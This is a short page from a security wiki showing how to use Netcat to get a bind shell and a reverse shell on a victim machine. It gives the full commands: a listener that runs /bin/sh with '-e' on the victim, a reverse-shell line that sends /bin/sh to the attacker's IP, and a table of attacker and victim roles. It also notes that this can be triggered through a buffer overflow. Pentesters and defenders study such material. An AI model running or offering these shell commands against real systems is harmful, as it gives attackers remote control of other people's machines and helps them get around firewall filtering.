Ns1198:Netcat/3/en

From aldeid
Jump to navigation Jump to search

On the client (victim), enter the following command:

$ nc -l -p 1234 -e /bin/sh

From the position of the attacker, enter the following command (adapting the IP address):

$ nc 12.34.567.89 1234

From the position of the attacker, it is now possible to perform all the commands you want, as if they were physically on the remote machine.

cd /
ls
bin
boot
cdrom
dev
etc
home
...
<^C>

Reverse-Shell

When filtering system blocks connections from the outside, it is possible to create a reverse-shell. This technique can be implemented with Netcat.

Type Attacker (192.168.161.1) Victim (192.168.161.129)
Shell nc 192.168.161.129 1234 nc -l -p 1234 -e /bin/sh
Reverse Shell nc -l -p 1234 nc 192.168.161.1 1234 -e /bin/sh

With the technique of reverse-shell, this is not the attacker connects to the victim, but the reverse. Through -e option which allows you to run commands, the attacker can, from its terminal, run remote from his post commands.

Info.png
Note
Running Netcat in client mode or listening on the computer of the victim can be done in a buffer-overflow.

Reverse-shell.png